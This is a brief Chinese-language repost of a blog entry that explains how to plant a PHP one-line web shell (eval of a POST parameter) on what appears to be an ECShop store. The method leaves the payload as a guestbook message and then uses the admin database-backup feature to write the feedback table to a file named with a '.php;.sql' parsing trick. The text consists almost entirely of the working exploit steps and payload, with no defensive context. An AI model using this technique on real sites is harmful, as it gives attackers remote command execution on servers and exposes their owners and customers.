可以绕过权限上传一句话木马 前台留个言,内容是我们的一句话木马:<?php eval($_POST[cmd]);?> 接着在后台系统==> 数据库管理==>数据备份==>选择自定义备份,选择ecs_feedback这张表(存放留言的表) 备份文件名:xxx. php;.sql 这种格式来备份 提示成功了。 一句话连接成功 转载于:https://www.cnblogs.com/mujj/articles/3089836.html